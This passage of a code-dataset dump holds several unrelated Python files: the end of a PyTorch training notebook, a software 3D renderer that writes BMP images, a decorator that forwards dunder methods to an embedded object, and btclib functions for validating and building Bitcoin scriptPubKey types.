torch.split(x, maxSentenceLen, dim=1)\n        a = splitX[0].view(-1, maxSentenceLen*embedDim)\n        b = splitX[1].view(-1, maxSentenceLen*embedDim) #n,15*100\n        print (\"b:\",b.shape)\n        \n        outla = self.la(a)\n        outlb = self.lb(b) #n, 100\n        print (\"Outa,Outb:\",outla.data.shape)\n        outlab = torch.cat((outla,outlb),1)\n        yPred = self.l1(outlab)\n        #print (x.shape)\n        return yPred\n    \n\n\n# ### Define Models, Loss, Optimizer\n\n# In[56]:\n\n\nmodel = DNN()\n\n\n# In[57]:\n\n\nlossCriterion = 
nn.MSELoss(reduction='mean')\noptimizer = torch.optim.SGD(model.parameters(),lr=0.001)\n\n\n# ## Training\n\n# In[58]:\n\n\ndef train(epoch):\n    model.train()\n    loss = 0\n    for batchIdx, data in enumerate(trainLoader):\n        xTrain, labels = data\n        yPred = model(xTrain)\n        labels = labels.view(-1,1)\n        #print (xTrain.shape,yPred.shape, labels.shape)\n        loss = lossCriterion(yPred, labels)\n        if batchIdx %10 == 0:\n            print (\"Epoch : {}, Batch : {}, Progress:{:.2f}% Loss: {:.6f}\".format(epoch,batchIdx,batchIdx * 100./len(trainLoader), loss.data))\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n\n\n# ## Testing \n\n# In[59]:\n\n\n#outpath = os.path.join(\"output/\",model.modelName)\noutpath = os.path.join(\"output/\",\"DNN_1Lyr_cW2V\")\n\n\n# In[60]:\n\n\ndef test(loader, model=model):\n#     if isVal:\n#         loader = validationLoader\n#     else:\n#         loader = testLoader\n    model.eval()\n    testloss = 0\n    allPredValue = []\n    for batchIdx, data in enumerate(loader):\n        xVal, labels = data\n        yPred = model(xVal)\n        labels = labels.view(-1,1)\n        testloss += lossCriterion(yPred, labels).data\n        allPredValue.append((labels.data.squeeze(),yPred.data.squeeze()))\n        \n    testloss /= len(loader)\n    \n    # print (\"Average Loss: \",loss.data)\n    \n    return allPredValue, testloss.data\n    \n\n\n# In[61]:\n\n\n# Write results\ndef results(typeData, output, loss, epoch):\n    \n    \n    gsc = os.path.join(outpath,typeData+\"gs.txt\")\n    sys = os.path.join(outpath,typeData+\"sys.txt\")\n    results = os.path.join(outpath,typeData+\"result.txt\")\n    \n    rs = open(results,'w')\n    rs.write(\"Epoch:{},\\n Loss:{:.4f}\\n\".format(epoch,loss))\n    rs.close()\n    \n    \n    g = open(gsc,'w')\n    s = open(sys,'w')\n\n    for gs,ps in output:\n        for eachGs, eachPs in zip(gs,ps):\n            #print (eachGs.item(), eachPs.item() )\n            g.write(str(round(eachGs.item(),2))+\"\\n\")\n            s.write(str(round(np.clip(eachPs.item(),0,5),2))+\"\\n\")\n    \n    g.close()\n    s.close()\n    \n\n\n# In[62]:\n\n\nepochs = 10\nisVal = True\nprevLoss = 0\nevalloss = 0\n\n# 1 - valid\n# 2 - test\n# 3 - train\n\n\nfor eachEpoch in range(1,epochs):\n    train(eachEpoch)\n    output, evalloss = test(validationLoader)\n    print (evalloss)\n    if eachEpoch > 1 and evalloss > prevLoss:\n        continue\n    \n    print (\"Found Better model with loss :{:.4f}, PreviousLoss:{:.4f}\".format(evalloss,prevLoss))\n    prevLoss = evalloss\n    #Save the best model\n    bestmodelFile = os.path.join(outpath,'bestModel.pt')\n    pickle.dump(model,open(bestmodelFile,'wb'))\n    \n    #Output results in file\n    results('val', output, evalloss, eachEpoch)\n    \n\n\n# ### Run Test results with the best model\n\n# In[61]:\n\n\n\ntrainedModelFile = os.path.join(outpath,'bestModel.pt')\nisVal = False\nbestModel = pickle.load(open(trainedModelFile,'rb'))\noutput, evalloss = test(testLoader,bestModel)\nresults('test', output, evalloss, 0)\nprint(\"Test Results:\\n Loss:{:.4f}\".format(evalloss))\n\noutput, evalloss = test(trainLoader,bestModel)\nresults('train', output, evalloss, 0)\nprint(\"Train Results:\\n Loss:{:.4f}\".format(evalloss))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"models/dl/AnalysisTokensMissingPubmedW2V.py","file_name":"AnalysisTokensMissingPubmedW2V.py","file_ext":"py","file_size_in_byte":12066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"329647672","text":"import numpy as np\nfrom collections import namedtuple\n\nfrom obj import Obj\nfrom utils.gl_color import color, decimalToRgb\nfrom utils.gl_encode import char, word, dword\nfrom utils.gl_math import cross, dot, substract, norm, V2, V3\n\nBLACK = 
color(0,0,0)\nWHITE = color(1,1,1)\n\ndef baryCoords(A, B, C, P):\n    # u is for A, v is for B, w for C\n    try:\n        u = ( ((B.y - C.y)*(P.x - C.x) + (C.x - B.x)*(P.y - C.y) ) /\n              ((B.y - C.y)*(A.x - C.x) + (C.x - B.x)*(A.y - C.y)) )\n\n        v = ( ((C.y - A.y)*(P.x - C.x) + (A.x - C.x)*(P.y - C.y) ) /\n              ((B.y - C.y)*(A.x - C.x) + (C.x - B.x)*(A.y - C.y)) )\n\n        w = 1 - u - v\n    except:\n        return -1, -1, -1\n\n    return u, v, w\n\n\nclass Render(object):\n    def __init__(self, width, height):\n        self.curr_color = WHITE\n        self.clear_color = BLACK\n        self.glCreateWindow(width, height)\n\n        self.light = V3(0,0,1)\n        self.active_texture = None\n\n        self.active_shader = None\n\n    def glCreateWindow(self, width, height):\n        self.width = width\n        self.height = height\n        self.glClear()\n        self.glViewport(0,0, width, height)\n\n    def glViewport(self, x, y, width, height):\n        self.viewport_initial_x = x\n        self.viewport_initial_y = y\n        self.viewport_width = width\n        self.viewport_height = height\n        self.viewport_final_x = x + width\n        self.viewport_final_y = y + height\n\n    def glClear(self):\n        self.pixels = [ [ self.clear_color for x in range(self.width)] for y in range(self.height) ]\n        \n        # Zbuffer\n        self.zbuffer = [ [ -float('inf') for x in range(self.width)] for y in range(self.height) ]\n        \n    def glVertextInViewport(self, x,y):\n        return (x >= self.viewport_initial_x and\n                x <= self.viewport_final_x) and (\n                y >= self.viewport_initial_y and\n                y <= self.viewport_final_y)\n\n\n    def glVertex(self, x, y, color = None):\n        pixelX = ( x + 1) * (self.viewport_width / 2 ) + self.viewport_initial_x\n        pixelY = ( y + 1) * (self.viewport_height / 2 ) + self.viewport_initial_y\n        \n        if pixelX >= self.width or pixelX < 0 or pixelY >= self.height or pixelY < 0:\n            return\n\n        try:\n            self.pixels[round(pixelY)][round(pixelX)] = color or self.curr_color\n        except:\n            pass\n    \n    def glPoint(self, x, y, color = None):\n        if x >= self.width or x < 0 or y >= self.height or y < 0:\n            return\n        try:\n            self.pixels[y][x] = color or self.curr_color\n        except:\n            pass\n    \n    def glColor(self, r,g,b):\n        self.curr_color = color(r,g,b)\n\n    def glClearColor(self, r,g,b):\n        self.clear_color = color(r,g,b)\n\n    def glFixCoordinate(self, value, main_axis):\n        fixed_coordinate = 0\n        if main_axis:\n            fixed_coordinate = (value+1) * (self.viewport_width/2) + self.viewport_initial_x\n        else:\n            fixed_coordinate = (value+1) * (self.viewport_height/2) + self.viewport_initial_y\n        return round(fixed_coordinate)\n    \n    \n    # Generate .bmp file\n    def glFinish(self, filename):\n        archivo = open(filename, 'wb')\n\n        # File header 14 bytes\n        archivo.write(bytes('B'.encode('ascii')))\n        archivo.write(bytes('M'.encode('ascii')))\n\n        archivo.write(dword(14 + 40 + self.width * self.height * 3))\n        archivo.write(dword(0))\n        archivo.write(dword(14 + 40))\n\n        # Image Header 40 bytes\n        archivo.write(dword(40))\n        archivo.write(dword(self.width))\n        archivo.write(dword(self.height))\n        archivo.write(word(1))\n        archivo.write(word(24))\n        archivo.write(dword(0))\n        archivo.write(dword(self.width * self.height * 3))\n        archivo.write(dword(0))\n        archivo.write(dword(0))\n        archivo.write(dword(0))\n        archivo.write(dword(0))\n        \n        # Pixels, 3 bytes each\n\n        for x in range(self.height):\n            for y in range(self.width):\n                archivo.write(self.pixels[x][y])\n\n        archivo.close()\n\n    def glZBuffer(self, filename):\n        archivo = open(filename, 'wb')\n\n        # File header 14 bytes\n        archivo.write(bytes('B'.encode('ascii')))\n        archivo.write(bytes('M'.encode('ascii')))\n        archivo.write(dword(14 + 40 + self.width * self.height * 3))\n        archivo.write(dword(0))\n        archivo.write(dword(14 + 
40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n # Minimo y el maximo\n minZ = float('inf')\n maxZ = -float('inf')\n for x in range(self.height):\n for y in range(self.width):\n if self.zbuffer[x][y] != -float('inf'):\n if self.zbuffer[x][y] < minZ:\n minZ = self.zbuffer[x][y]\n\n if self.zbuffer[x][y] > maxZ:\n maxZ = self.zbuffer[x][y]\n\n for x in range(self.height):\n for y in range(self.width):\n depth = self.zbuffer[x][y]\n if depth == -float('inf'):\n depth = minZ\n depth = (depth - minZ) / (maxZ - minZ)\n archivo.write(color(depth,depth,depth))\n\n archivo.close()\n \n def glLine(self, v0, v1, color = None) :\n x0 = self.glFixCoordinate(v0.x, True)\n x1 = self.glFixCoordinate(v1.x, True)\n y0 = self.glFixCoordinate(v0.y, False)\n y1 = self.glFixCoordinate(v1.y, False)\n\n steep = abs(y1 - y0) > abs(x1 - x0)\n\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx, dy = abs(x1 - x0), abs(y1 - y0) \n \n offset = 0\n limit = 0.5\n y = y0\n\n for x in range(x0, x1+1):\n self.glPoint(y, x, color) if steep else self.glPoint(x, y, color)\n \n offset += 2*dy\n\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 2*dx\n\n def glLine_coord(self, v0, v1, color = None):\n x0 = v0.x\n x1 = v1.x\n y0 = v0.y\n y1 = v1.y\n\n steep = abs(y1 - y0) > abs(x1 - x0)\n\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx, dy = abs(x1 - x0), abs(y1 - y0) \n \n offset = 0\n limit = 0.5\n y = y0\n \n try:\n m = dy/dx\n except ZeroDivisionError:\n pass\n \n for x in range(x0, x1+1):\n self.glPoint(y, x, color) if steep else self.glPoint(x, y, color)\n \n offset += 2*dy\n\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 2*dx \n \n def transform(self, vertex, translate=V3(0,0,0), scale=V3(1,1,1)):\n return V3(round(vertex[0] * scale.x + translate.x),\n round(vertex[1] * scale.y + translate.y),\n round(vertex[2] * scale.z + translate.z))\n \n # Check if a given point (x,y) is inside the polygon\n def glIsPointInPolygon(self, x, y, polygon):\n # Args:\n # x: the x coordinate of point.\n # y: the y coordinate of point.\n # polygon: a list of tuples [(x, y), (x, y), ...] representing the vertices of the polygon\n\n # Returns:\n # True if the point is in the path.\n verticesCount = len(polygon)\n j = verticesCount - 1\n c = False\n for i in range(verticesCount):\n if ((polygon[i][1] > y) != (polygon[j][1] > y)) and \\\n (x < polygon[i][0] + (polygon[j][0] - polygon[i][0]) * (y - polygon[i][1]) /\n (polygon[j][1] - polygon[i][1])):\n c = not c\n j = i\n return c\n \n # Fill the polygon\n def glFillPolygon(self, polygon):\n # Args:\n # polygon: a list of tuples [(x, y), (x, y), ...] 
representing the vertices of the polygon\n\n        # Returns:\n        #     nothing\n        \n        minX, maxX, minY, maxY = 0,0,0,0\n        \n        # Calculate the min and max points in x-axis and y-axis for the polygon\n        for i in range(len(polygon)):\n            if(polygon[i][0] < minX):\n                minX = polygon[i][0]\n            elif(polygon[i][0] > maxX):\n                maxX = polygon[i][0]\n            if(polygon[i][1] < minY):\n                minY = polygon[i][1]\n            elif(polygon[i][1] > maxY):\n                maxY = polygon[i][1]\n\n        # Iterate over those numbers and check if every point is in the polygon\n        # If it is, fill it\n        for y in range(minY, maxY):\n            for x in range(minX, maxX):\n                if (self.glIsPointInPolygon(x,y, polygon)):\n                    self.glPoint(x, y)\n    \n    # Draw the polygon joining the dots with glLine_coord\n    def glDrawPolygon(self, vertices):\n        count = len(vertices)\n\n        for limit in range(count):\n            v0 = vertices[limit]\n            v1 = vertices[(limit + 1) % count]\n            self.glLine_coord(V2(v0[0], v0[1]), V2(v1[0], v1[1]))\n\n\n    def loadModel(self, filename, translate = V3(0,0,0), scale = V3(1,1,1), isWireframe = False):\n        model = Obj(filename)\n\n        for face in model.faces:\n\n            vertCount = len(face)\n\n            if isWireframe:\n                for vert in range(vertCount):\n                    v0 = model.vertices[ face[vert][0] - 1 ]\n                    v1 = model.vertices[ face[(vert + 1) % vertCount][0] - 1]\n                    v0 = V2(round(v0[0] * scale.x + translate.x),round(v0[1] * scale.y + translate.y))\n                    v1 = V2(round(v1[0] * scale.x + translate.x),round(v1[1] * scale.y + translate.y))\n                    self.glLine_coord(v0, v1)\n\n            else:\n                v0 = model.vertices[ face[0][0] - 1 ]\n                v1 = model.vertices[ face[1][0] - 1 ]\n                v2 = model.vertices[ face[2][0] - 1 ]\n                if vertCount > 3:\n                    v3 = model.vertices[ face[3][0] - 1 ]\n\n                v0 = self.transform(v0,translate, scale)\n                v1 = self.transform(v1,translate, scale)\n                v2 = self.transform(v2,translate, scale)\n                if vertCount > 3:\n                    v3 = self.transform(v3,translate, scale)\n\n                if self.active_texture:\n                    vt0 = model.texcoords[face[0][1] - 1]\n                    vt1 = model.texcoords[face[1][1] - 1]\n                    vt2 = model.texcoords[face[2][1] - 1]\n                    vt0 = V2(vt0[0], vt0[1])\n                    vt1 = V2(vt1[0], vt1[1])\n                    vt2 = V2(vt2[0], vt2[1])\n                    if vertCount > 3:\n                        vt3 = model.texcoords[face[3][1] - 1]\n                        vt3 = V2(vt3[0], vt3[1])\n                else:\n                    vt0 = V2(0,0) \n                    vt1 = V2(0,0) \n                    vt2 = V2(0,0) \n                    vt3 = V2(0,0)\n                vn0 = model.normals[face[0][2] - 1]\n                vn1 = model.normals[face[1][2] - 1]\n                vn2 = model.normals[face[2][2] - 1]\n                if vertCount > 3:\n                    vn3 = model.normals[face[3][2] - 1]\n\n                self.triangle_bc(v0,v1,v2, texcoords = (vt0,vt1,vt2), normals = (vn0,vn1,vn2))\n                if vertCount > 3: #assume 4, a quad\n                    self.triangle_bc(v0,v2,v3, texcoords = (vt0,vt2,vt3), normals = (vn0,vn2,vn3)) \n    \n    #Barycentric Coordinates\n    def triangle_bc(self, A, B, C, texcoords = (), normals = (), _color = None):\n        #bounding box\n        minX = min(A.x, B.x, C.x)\n        minY = min(A.y, B.y, C.y)\n        maxX = max(A.x, B.x, C.x)\n        maxY = max(A.y, B.y, C.y)\n\n        for x in range(minX, maxX + 1):\n            for y in range(minY, maxY + 1):\n                if x >= self.width or x < 0 or y >= self.height or y < 0:\n                    continue\n\n                u, v, w = baryCoords(A, B, C, V2(x, y))\n\n                if u >= 0 and v >= 0 and w >= 0:\n\n                    z = A.z * u + B.z * v + C.z * w\n                    if z > self.zbuffer[y][x]:\n                        \n                        r, g, b = self.active_shader(\n                            self,\n                            verts=(A,B,C),\n                            baryCoords=(u,v,w),\n                            texCoords=texcoords,\n                            normals=normals,\n                            color = _color or self.curr_color)\n\n                        self.glPoint(x, y, color(r,g,b))\n                        self.zbuffer[y][x] = z\n\n\n","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"512978304","text":"\"\"\"\nProvides class decorator @provideOverloads for creating the necessary\n__dunder__ methods based on the embeded object of a proxy/delegation object.\n\nOptionally and ideally, one can define a `name` parameter for defining the embeded\nobject for which we want to redirect built-in operations.\n\nIf one is not supplied, a generic and unsound method to detect it\nis performed with `force_exception`. If that fails (and the embeded object is initialized)\nwe make the false assumption that the sole argument in the `__dict__` of the proxy\nobject is the instance of the embedded object.\n\nIn short, supply a `name` parameter indicating the name of the embedded object.\n\nIn addition, you can supply the names of the dunder methods for which overloading sound\nbe performed (as is, ALL methods of the embedded object are added) (TBT)\n\nLook at the self test code at the bottom for a small demo. (TBD)\n\"\"\"\n\nimport sys\nimport traceback\nimport inspect\nif __name__ == \"__main__\":\n from dunders import dunders\nelse:\n from proxyOverload.dunders import dunders\n\n# Ignore these special methods.\nIGNORES = ['__weakref__', '__doc__', '__dict__', '__module__', '__init__']\n\n\ndef provideOverloads(name=None, overloads=None):\n \"\"\"\n Description:\n ------------\n Provide arguments for the decoration call.\n\n Arguments:\n -----------\n @name : Name of the embedded object in cls\n @overloads: Container with the method names.\n\n Return:\n -------\n @wrapMe: function for wrapping the proxy class.\n \"\"\"\n def wrapMe(cls):\n \"\"\"\n Description:\n ------------\n Wrap class cls and return it after adding\n the needed methods.\n\n Arguments:\n ----------\n @cls: proxy class\n\n Return:\n -------\n @cls: proxy class with added methods.\n \"\"\"\n # testing (globals generally wont give me what I want)\n # need a different way to access namespace of module\n # in which cls is defined.\n namespace = get_module_namespace(cls)\n\n if name is None:\n obj = force_exception(cls)\n else:\n try:\n obj = namespace[name]\n except KeyError:\n print(\"Parameter {} does not exist in the global dictionary.\".format(name))\n print(\"No overloading could be performed.\")\n\n # Add dunders to cls\n for dmeth in obj.__dict__:\n if dmeth not in IGNORES and dunderCheck(dmeth):\n # ignore dunders not in overloads if defined.\n if overloads and dmeth not in overloads:\n continue\n setattr(cls, dmeth, dunders[dmeth])\n return cls\n return wrapMe\n\n\ndef force_exception(cls):\n \"\"\"\n Description:\n ------------\n Try and force an exception in the creation of the\n embedded object in hopes that you might catch the\n name of it in the\n\n Arguments:\n -----------\n @cls : Proxy Class\n\n Return:\n -------\n The class of the embedded object.\n \"\"\"\n namespace = get_module_namespace(cls)\n c = None\n try:\n c = cls() # we try to initialize\n except: # intentionally broad. 
# except TypeError as t might be more suitable\n *_, exc_traceback = sys.exc_info()\n lines = traceback.format_exc().splitlines()\n name = lines[-2].split(\"=\")[1].split(\"(\")[0].strip()\n\n return namespace[name]\n name = list(c.__dict__.values())[0]\n return name.__class__\n\n\ndef get_module_namespace(cls):\n \"\"\"\n Get the namespace in which cls is defined.\n (This should generally contain the embedded instance)\n \"\"\"\n return vars(sys.modules[cls.__module__])\n\n\ndef dunderCheck(name):\n \"\"\"\n Check if a method name is a dunder (__name__)\n \"\"\"\n return True if name.startswith(\"__\") and name.endswith(\"__\") else False\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"ProxyOverload/proxyOverload/proxyOverload.py","file_name":"proxyOverload.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355374934","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2021 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"ScriptPubKey functions.\"\n\nfrom typing import Callable, List, Optional, Tuple\n\nfrom btclib import var_bytes\nfrom btclib.alias import Octets, String\nfrom btclib.ecc.sec_point import point_from_octets\nfrom btclib.exceptions import BTClibValueError\nfrom btclib.hashes import hash160_from_key\nfrom btclib.script.script import serialize\nfrom btclib.to_pub_key import Key, pub_keyinfo_from_key\nfrom btclib.utils import bytes_from_octets, bytesio_from_binarydata, hash160, sha256\n\n# 1. Hash/WitnessProgram from pub_key/script_pub_key\n\n# hash160_from_key, hash160, and sha256\n# are imported from hashes.py and utils.py\n\n\n# 2. 
script_pub_key from Hash/WitnessProgram and vice versa\n\n\ndef _is_funct(assert_funct: Callable[[Octets], None], script_pub_key: Octets) -> bool:\n\n    try:\n        # if the assert function detects a problem, it must raise an Exception\n        assert_funct(script_pub_key)\n    # must always return a bool: all Exceptions are caught\n    except Exception:  # pylint: disable=broad-except\n        return False\n    return True\n\n\ndef assert_p2pk(script_pub_key: Octets) -> None:\n    script_pub_key = bytes_from_octets(script_pub_key, (35, 67))\n    # p2pk [pub_key, OP_CHECKSIG]\n    # 0x41{65-byte pub_key}AC\n    # or\n    # 0x21{33-byte pub_key}AC\n    if script_pub_key[-1] != 0xAC:\n        raise BTClibValueError(\"missing final OP_CHECKSIG\")\n\n    len_marker = script_pub_key[0]\n    length = len(script_pub_key)\n    if length == 35:\n        if len_marker != 0x21:\n            err_msg = f\"invalid pub_key length marker: {len_marker}\"\n            err_msg += f\" instead of {0x21}\"\n            raise BTClibValueError(err_msg)\n    elif length == 67:\n        if len_marker != 0x41:\n            err_msg = f\"invalid pub_key length marker: {len_marker}\"\n            err_msg += f\" instead of {0x41}\"\n            raise BTClibValueError(err_msg)\n\n    pub_key = script_pub_key[1:-1]\n    point_from_octets(pub_key)\n\n\ndef is_p2pk(script_pub_key: Octets) -> bool:\n    return _is_funct(assert_p2pk, script_pub_key)\n\n\ndef assert_p2pkh(script_pub_key: Octets) -> None:\n    script_pub_key = bytes_from_octets(script_pub_key, 25)\n    # p2pkh [OP_DUP, OP_HASH160, pub_key hash, OP_EQUALVERIFY, OP_CHECKSIG]\n    # 0x76A914{20-byte pub_key_hash}88AC\n    if script_pub_key[-2:] != b\"\\x88\\xac\":\n        raise BTClibValueError(\"missing final OP_EQUALVERIFY, OP_CHECKSIG\")\n    if script_pub_key[:2] != b\"\\x76\\xa9\":\n        raise BTClibValueError(\"missing leading OP_DUP, OP_HASH160\")\n    if script_pub_key[2] != 0x14:\n        err_msg = f\"invalid pub_key hash length marker: {script_pub_key[2]}\"\n        err_msg += f\" instead of {0x14}\"\n        raise BTClibValueError(err_msg)\n\n\ndef is_p2pkh(script_pub_key: Octets) -> bool:\n    return _is_funct(assert_p2pkh, script_pub_key)\n\n\ndef assert_p2sh(script_pub_key: Octets) -> None:\n    script_pub_key = bytes_from_octets(script_pub_key, 23)\n    # p2sh [OP_HASH160, redeem_script hash, OP_EQUAL]\n    # 0xA914{20-byte redeem_script hash}87\n    if script_pub_key[-1] != 0x87:\n        raise BTClibValueError(\"missing final OP_EQUAL\")\n    if script_pub_key[0] != 0xA9:\n        raise BTClibValueError(\"missing leading OP_HASH160\")\n    if script_pub_key[1] != 0x14:\n        err_msg = f\"invalid redeem script hash length marker: {script_pub_key[1]}\"\n        err_msg += f\" instead of {0x14}\"\n        raise BTClibValueError(err_msg)\n\n\ndef is_p2sh(script_pub_key: Octets) -> bool:\n    return _is_funct(assert_p2sh, script_pub_key)\n\n\ndef assert_p2ms(script_pub_key: Octets) -> None:\n    script_pub_key = bytes_from_octets(script_pub_key)\n    # p2ms [m, pub_keys, n, OP_CHECKMULTISIG]\n    length = len(script_pub_key)\n    if length < 37:\n        raise BTClibValueError(f\"invalid length {length}\")\n    if script_pub_key[-1] != 0xAE:\n        raise BTClibValueError(\"missing final OP_CHECKMULTISIG\")\n    m = script_pub_key[0] - 80\n    if not 0 < m < 17:\n        raise BTClibValueError(f\"invalid m in m-of-n: {m}\")\n    n = script_pub_key[-2] - 80\n    if not m <= n < 17:\n        raise BTClibValueError(f\"invalid m-of-n: {m}-of-{n}\")\n\n    stream = bytesio_from_binarydata(script_pub_key[1:-2])\n    for _ in range(n):\n        pub_key = var_bytes.parse(stream)\n        point_from_octets(pub_key)\n\n    if stream.read(1):\n        raise BTClibValueError(\"invalid extra data\")\n\n\ndef is_p2ms(script_pub_key: Octets) -> bool:\n    return _is_funct(assert_p2ms, script_pub_key)\n\n\ndef 
assert_nulldata(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key)\n # nulldata [OP_RETURN, data]\n length = len(script_pub_key)\n if length == 0:\n raise BTClibValueError(\"null length\")\n if script_pub_key[0] != 0x6A:\n raise BTClibValueError(\"missing leading OP_RETURN\")\n\n if length == 78 or length >= 84:\n raise BTClibValueError(f\"invalid length {length}\")\n\n # OP_RETURN, data length, data up to 75 bytes max\n # 0x6A{1 byte data-length}{data (0-75 bytes)}\n if length < 78:\n if script_pub_key[1] != length - 2:\n raise BTClibValueError(f\"invalid data length marker {script_pub_key[1]}\")\n # OP_RETURN, OP_PUSHDATA1, data length, data min 76 bytes up to 80\n # 0x6A4C{1-byte data-length}{data (76-80 bytes)}\n elif script_pub_key[1] != 0x4C or script_pub_key[2] != length - 3:\n err_msg = f\"invalid data length marker {script_pub_key[1:2].hex()}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_nulldata(script_pub_key: Octets) -> bool:\n return _is_funct(assert_nulldata, script_pub_key)\n\n\ndef assert_p2wpkh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 22)\n # p2wpkh [0, pub_key hash]\n # 0x0014{20-byte pub_key hash}\n if script_pub_key[0] != 0:\n err_msg = f\"invalid witness version: {script_pub_key[0]}\"\n err_msg += f\" instead of {0}\"\n raise BTClibValueError(err_msg)\n if script_pub_key[1] != 0x14:\n err_msg = f\"invalid pub_key hash length marker: {script_pub_key[1]}\"\n err_msg += f\" instead of {0x14}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2wpkh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2wpkh, script_pub_key)\n\n\ndef assert_p2wsh(script_pub_key: Octets) -> None:\n script_pub_key = bytes_from_octets(script_pub_key, 34)\n # p2wsh [0, redeem_script hash]\n # 0x0020{32-byte redeem_script hash}\n if script_pub_key[0] != 0:\n err_msg = f\"invalid witness version: {script_pub_key[0]}\"\n err_msg += f\" instead of {0}\"\n raise BTClibValueError(err_msg)\n if script_pub_key[1] != 0x20:\n err_msg = f\"invalid redeem script hash length marker: {script_pub_key[1]}\"\n err_msg += f\" instead of {0x20}\"\n raise BTClibValueError(err_msg)\n\n\ndef is_p2wsh(script_pub_key: Octets) -> bool:\n return _is_funct(assert_p2wsh, script_pub_key)\n\n\ndef script_pub_key_from_payload(script_type: str, payload: Octets) -> bytes:\n \"Return the script_pub_key for the provided script_type and payload.\"\n # sourcery skip: switch\n\n script_type = script_type.lower()\n\n if script_type == \"p2ms\":\n script_pub_key = bytes_from_octets(payload) + b\"\\xae\"\n if not is_p2ms(script_pub_key):\n raise BTClibValueError(\"invalid p2ms payload\")\n return script_pub_key\n\n if script_type == \"nulldata\":\n payload = bytes_from_octets(payload)\n if len(payload) > 80:\n err_msg = f\"invalid nulldata script length: {len(payload)} bytes \"\n raise BTClibValueError(err_msg)\n return serialize([\"OP_RETURN\", payload])\n\n if script_type == \"p2pk\":\n payload = bytes_from_octets(payload, (33, 65))\n # TODO: check it is a valid pub_key\n return serialize([payload, \"OP_CHECKSIG\"])\n\n if script_type == \"p2wsh\":\n payload = bytes_from_octets(payload, 32)\n return serialize([0, payload])\n\n if script_type == \"p2pkh\":\n payload = bytes_from_octets(payload, 20)\n return serialize(\n [\n \"OP_DUP\",\n \"OP_HASH160\",\n payload,\n \"OP_EQUALVERIFY\",\n \"OP_CHECKSIG\",\n ]\n )\n\n if script_type == \"p2sh\":\n payload = bytes_from_octets(payload, 20)\n return serialize([\"OP_HASH160\", payload, \"OP_EQUAL\"])\n\n 
if script_type == \"p2wpkh\":\n payload = bytes_from_octets(payload, 20)\n return serialize([0, payload])\n\n raise BTClibValueError(f\"unknown script_pub_key type: {script_type}\")\n\n\ndef payload_from_script_pub_key(script_pub_key: Octets) -> Tuple[str, bytes]:\n \"Return (script_pub_key type, payload) from the input script_pub_key.\"\n\n script_pub_key = bytes_from_octets(script_pub_key)\n\n if is_p2wpkh(script_pub_key):\n # p2wpkh [0, pub_key_hash]\n # 0x0014{20-byte pub_key_hash}\n return \"p2wpkh\", script_pub_key[2:]\n\n if is_p2wsh(script_pub_key):\n # p2wsh [0, script_hash]\n # 0x0020{32-byte script_hash}\n return \"p2wsh\", script_pub_key[2:]\n\n if is_p2pk(script_pub_key):\n # p2pk [pub_key, OP_CHECKSIG]\n # 0x41{65-byte pub_key}AC or 0x21{33-byte pub_key}AC\n return \"p2pk\", script_pub_key[1:-1]\n\n if is_p2ms(script_pub_key):\n # p2ms [m, pub_keys, n, OP_CHECKMULTISIG]\n return \"p2ms\", script_pub_key[:-1]\n\n if is_nulldata(script_pub_key):\n # nulldata [OP_RETURN, data]\n if len(script_pub_key) < 78:\n # OP_RETURN, data length, data up to 75 bytes max\n # 0x6A{1 byte data-length}{data (0-75 bytes)}\n return \"nulldata\", script_pub_key[2:]\n\n # OP_RETURN, OP_PUSHDATA1, data length, data min 76 bytes up to 80\n # 0x6A4C{1-byte data-length}{data (76-80 bytes)}\n return \"nulldata\", script_pub_key[3:]\n\n if is_p2pkh(script_pub_key):\n # p2pkh [OP_DUP, OP_HASH160, pub_key_hash, OP_EQUALVERIFY, OP_CHECKSIG]\n # 0x76A914{20-byte pub_key_hash}88AC\n length = len(script_pub_key)\n return \"p2pkh\", script_pub_key[3 : length - 2]\n\n if is_p2sh(script_pub_key):\n # p2sh [OP_HASH160, script_hash, OP_EQUAL]\n # 0xA914{20-byte script_hash}87\n length = len(script_pub_key)\n return \"p2sh\", script_pub_key[2 : length - 1]\n\n return \"unknown\", script_pub_key\n\n\n# 1.+2. = 3. 
